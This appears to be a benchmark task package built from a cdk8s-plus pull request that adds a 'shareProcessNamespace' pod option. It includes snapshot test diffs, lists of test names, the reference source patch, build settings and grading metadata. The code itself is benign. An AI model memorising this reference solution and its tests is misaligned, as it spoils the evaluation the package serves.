"shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1607,6 +1627,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1659,6 +1680,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1828,6 +1850,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1873,6 +1896,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1923,6 +1947,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2034,6 +2059,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2154,6 +2180,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2204,6 +2231,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2366,6 +2394,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2478,6 +2507,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2582,6 +2612,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2661,6 +2692,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2779,6 +2811,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2896,6 +2929,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2946,6 +2980,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3072,6 +3107,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3124,6 +3160,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3293,6 +3330,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3338,6 +3376,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3388,6 +3427,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3499,6 +3539,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3619,6 +3660,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3669,6 +3711,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3831,6 +3874,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3943,6 +3987,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4011,6 +4056,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4061,6 +4107,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4155,6 +4202,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4257,6 +4305,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4351,6 +4400,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4440,6 +4490,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4490,6 +4541,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4598,6 +4650,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4760,6 +4813,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4811,6 +4865,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4881,6 +4936,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4950,6 +5006,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5000,6 +5057,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5062,6 +5120,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5112,6 +5171,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5171,6 +5231,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5238,6 +5299,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5303,6 +5365,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5353,6 +5416,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5415,6 +5479,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5465,6 +5530,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5524,6 +5590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5591,6 +5658,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5663,6 +5731,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5713,6 +5782,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "tolerations": Array [ Object { diff --git a/test/__snapshots__/service.test.ts.snap b/test/__snapshots__/service.test.ts.snap index 51c9d49f..d27cc7bd 100644 --- a/test/__snapshots__/service.test.ts.snap +++ b/test/__snapshots__/service.test.ts.snap @@ -95,6 +95,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/statefulset.test.ts.snap b/test/__snapshots__/statefulset.test.ts.snap index 86d6f7b3..92e3117c 100644 --- a/test/__snapshots__/statefulset.test.ts.snap +++ b/test/__snapshots__/statefulset.test.ts.snap @@ -76,6 +76,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -197,6 +198,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, },
[ "Can be isolated", "default configuration", "custom configuration", "Can be exposed as via ingress", "exposing via a service preserves deployment namespace", "expose captures all container ports", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Instantiation properties are all respected", "can mount container to a pv", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "can select a deployment", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "can allow to peer across namespaces", "can allow to multiple peers", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "can allow from peer across namespaces", "can allow from multiple peers", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "StatefulSet gets defaults" ]
[ "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "Can mutate metadata", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "defaultChild", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "defaults", "can select namespaces", "can select all namespaces", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "mount options", "mount from ctor", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "cannot allow to namespaces selected by labels", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "cannot allow from namespaces selected by labels", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims" ]
Method: AbstractPod.shareProcessNamespace(self) Location: src/pod.ts – added as a public readonly field on the AbstractPod class and exposed through the class instance. Inputs: None (value is initialized from the constructor). Outputs: <boolean> – the value of the `shareProcessNamespace` flag that was supplied in the pod props (defaults to `false`). Description: Indicates whether the pod’s containers share a single process namespace; when `true` processes inside any container are visible to all other containers in the same pod. Function: AbstractPodProps.shareProcessNamespace Location: src/pod.ts – added to the `AbstractPodProps` interface definition. Inputs: <boolean optional> – `shareProcessNamespace` flag supplied when constructing a pod (default `false`). Outputs: None (affects pod configuration). Description: Optional property that enables the Kubernetes `shareProcessNamespace` pod spec field, allowing containers in the pod to share the same process namespace.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 11, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved", "backport" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/sorenlouv/backport", "https://github.com/cdk8s-team/cdk8s-plus/pull/4902" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests backporting a feature to add a `shareProcessNamespace` flag to Pods. The test patch adds this field with a default false value across many snapshot files, matching the intended behavior. The tests align with the new property and no unrelated test coupling or naming expectations are present. Therefore the task is well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
2f8b1d2d492366e416677b2dca6ffad53efd8e6a
2025-02-25 06:53:49
cdk8s-team__cdk8s-plus-5354
diff --git a/src/pod.ts b/src/pod.ts index 3ac602bc..14e4dfd2 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -19,6 +19,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public readonly dns: PodDns; public readonly dockerRegistryAuth?: secret.ISecret; public readonly automountServiceAccountToken: boolean; + public readonly shareProcessNamespace: boolean; public readonly hostNetwork?: boolean; public readonly terminationGracePeriod?: Duration; @@ -40,6 +41,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, this.dns = new PodDns(props.dns); this.dockerRegistryAuth = props.dockerRegistryAuth; this.automountServiceAccountToken = props.automountServiceAccountToken ?? false; + this.shareProcessNamespace = props.shareProcessNamespace ?? false; this.isolate = props.isolate ?? false; this.hostNetwork = props.hostNetwork ?? false; this.terminationGracePeriod = props.terminationGracePeriod ?? Duration.seconds(30); @@ -249,6 +251,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, setHostnameAsFqdn: dns.hostnameAsFQDN, imagePullSecrets: this.dockerRegistryAuth ? [{ name: this.dockerRegistryAuth.name }] : undefined, automountServiceAccountToken: this.automountServiceAccountToken, + shareProcessNamespace: this.shareProcessNamespace, hostNetwork: this.hostNetwork, terminationGracePeriodSeconds: this.terminationGracePeriod?.toSeconds(), }; @@ -437,6 +440,14 @@ export interface AbstractPodProps extends base.ResourceProps { */ readonly automountServiceAccountToken?: boolean; + /** + * When process namespace sharing is enabled, processes in a container are visible to all other containers in the same pod. + * + * @default false + * @see https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/ + */ + readonly shareProcessNamespace?: boolean; + /** * Isolates the pod. This will prevent any ingress or egress connections to / from this pod. * You can however allow explicit connections post instantiation by using the `.connections` property.
feat(pod): shareProcessNamespace (backport #4902) # Backport This will backport the following commits from `k8s-31/main` to `k8s-30/main`: - [feat(pod): shareProcessNamespace (#4902)](https://github.com/cdk8s-team/cdk8s-plus/pull/4902) <!--- Backport version: 9.5.1 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sorenlouv/backport)
**Title** Add support for `shareProcessNamespace` option on Pods **Problem** Users cannot enable process‑namespace sharing for containers within the same pod, limiting scenarios that require cross‑container process visibility (e.g., debugging or side‑car coordination). The existing pod API lacks a property to control this feature, so the generated manifests never include the corresponding Kubernetes field. **Root Cause** The pod abstraction does not expose a `shareProcessNamespace` flag, nor does the manifest‑generation logic copy such a flag into the pod spec. **Fix / Expected Behavior** - Introduce a new optional boolean flag on the pod construct to control process‑namespace sharing. - Default the flag to `false` to preserve current behavior. - Initialise the flag from user‑provided properties. - Propagate the flag into the rendered pod spec so that `shareProcessNamespace: true` appears when requested. - Document the flag with a reference to the official Kubernetes documentation. **Risk & Validation** - Backward compatibility is maintained because the default remains `false`. - Verify that manifests generated with the flag set to `true` contain the `shareProcessNamespace` field and that the field is omitted otherwise. - Run existing unit and integration tests to ensure no regression in pod creation or other properties.
5,354
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/container.test.ts.snap b/test/__snapshots__/container.test.ts.snap index c94d5044..ee03dfa1 100644 --- a/test/__snapshots__/container.test.ts.snap +++ b/test/__snapshots__/container.test.ts.snap @@ -68,6 +68,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -129,6 +130,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -179,6 +181,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -250,6 +253,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -306,6 +310,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "volumes": Array [ Object { diff --git a/test/__snapshots__/cron-job.test.ts.snap b/test/__snapshots__/cron-job.test.ts.snap index e8f2501a..309c040f 100644 --- a/test/__snapshots__/cron-job.test.ts.snap +++ b/test/__snapshots__/cron-job.test.ts.snap @@ -52,6 +52,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -138,6 +139,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -205,6 +207,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/daemon-set.test.ts.snap b/test/__snapshots__/daemon-set.test.ts.snap index 3b07d8a5..3ab34b83 100644 --- a/test/__snapshots__/daemon-set.test.ts.snap +++ b/test/__snapshots__/daemon-set.test.ts.snap @@ -54,6 +54,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -134,6 +135,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -196,6 +198,7 @@ Array [ "runAsNonRoot": true, }, 